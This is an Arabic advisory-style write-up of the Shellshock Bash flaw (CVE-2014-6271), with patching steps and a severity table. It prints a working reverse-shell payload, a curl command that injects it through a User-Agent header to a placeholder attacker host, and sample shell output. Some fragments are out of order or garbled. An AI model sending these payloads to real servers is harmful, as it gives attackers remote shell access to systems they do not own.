
CVE-2014-6271

ثغرة يوم الصفر عمرها 25 عاماً لتنفيذ الأوامر عن بُعد في GNU Bash عبر متغيرات البيئة
CVE-2014-6271، الملقبة بـ شيلشوك (وتعرف أيضاً بـ Bashdoor)، هي ثغرة حرجة لتنفيذ الأوامر عن بُعد (RCE) في قشرة GNU Bash.
يمكن للمهاجم إرسال متغيرات بيئة مصممة خصيصاً (عبر رؤوس HTTP، DHCP، SSH، إلخ) والحصول على وصول عن بُعد لقشرة النظام للخادم الأساسي — غالباً دون مصادقة وبأقل تدخل من المستخدم.
يحقن المهاجم متغيراً مصمماً خصيصاً (مثلاً في رأس User-Agent):
() { :; }; /bin/bash -i >& /dev/tcp/attacker-ip/4444 0>&1
يعالج Bash الحمولة بشكل غير صحيح كتعريف دالة + أوامر لاحقة. يتم تنفيذ الكود بعد (); فوراً عند استيراد المتغير.
يتم تشغيل الأمر بصلاحيات خادم الويب/العملية (غالباً root أو www-data).
النتيجة:
# تم تحقيق وصول عن بعد للقشرة
whoami
www-data
✅ ضعيف! (تم تشغيل RCE الخاص بـ شيلشوك)
vulnerable
test
سترى أيضاً القشرة العكسية تتصل فوراً.
env x='() { :;}; echo vulnerable' bash -c "echo test"
سيعود فوراً بـ:
vulnerable
test
(وهذا يؤكد أن Bash نفذ الأمر المحقون.)
قم بتشغيل هذا الأمر curl ضد برنامج CGI ضعيف في Apache:
curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/YOUR-IP/4444 0>&1" http://vulnerable-server/cgi-bin/test.sh
سترى هذا الخرج بالضبط في مستمع netcat الخاص بك:
bash: no job control in this shell
www-data@server:/var/www$ whoami
www-data
www-data@server:/var/www$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@server:/var/www$ ls -la
total 12
drwxr-xr-x 2 www-data www-data 4096 Sep 24 14:00 .
...
يظهر هذا الخرج مباشرة في قشرتك العكسية. لا خطأ، ولا 404.
هذا يعني أن لديك تنفيذ أوامر عن بُعد كامل على الخادم — لقد نجح حقن متغير البيئة بشكل مثالي.
جميع إصدارات GNU Bash:
1.14 حتى 4.3 (قبل مستوى التصحيح 30)
(بما في ذلك Linux، macOS، BSD، الأجهزة المدمجة)
قم بالترقية فوراً إلى:
Bash 4.3 مستوى التصحيح 30 أو أحدث (4.4+ موصى به)
# Ubuntu/Debian
apt update && apt install --only-upgrade bash
# Red Hat/CentOS
yum update bash
() {ابحث عن:
() {قد تتضمن مؤشرات الاختراق:
() { :;};/bin/bash -iرأس ضار/DHCP/SSH ← Bash يستورد متغير البيئة
↓
تعريف دالة + أوامر لاحقة يتم تنفيذها
↓
أمر تعسفي / قشرة عكسية
أدت هذه المشكلة إلى عدة CVEs متابعة (إصلاحات غير كاملة):
| مجال الخطر | التأثير |
|---|---|
| السرية | 🔴 عالي |
| التكامل | 🔴 عالي |
| التوفر | 🔴 عالي |
إذا كنت تدير أي خادم Linux/macOS/BSD في عام 2026: 🔥 قم بتصحيح Bash فوراً (حتى على الأنظمة المعزولة). 💡 افترض وجود اختراق إذا كان النظام غير المصحح معرضاً للإنترنت. 🛡 قم بمراجعة كاملة للسجلات وفحص السلامة.
| الحقل | القيمة |
|---|
| معرف CVE | CVE-2014-6271 |
| الخطورة | 🔴 حرجة |
| درجة CVSS | 10.0 (الحد الأقصى) |
| ناقل الهجوم | عن بُعد (HTTP، DHCP، SSH، إلخ) |
| مصادقة مطلوبة | ❌ لا (في العديد من النواقل) |
| تفاعل المستخدم | ❌ لا (في حالات CGI/DHCP) |
| التأثير | اختراق كامل للخادم |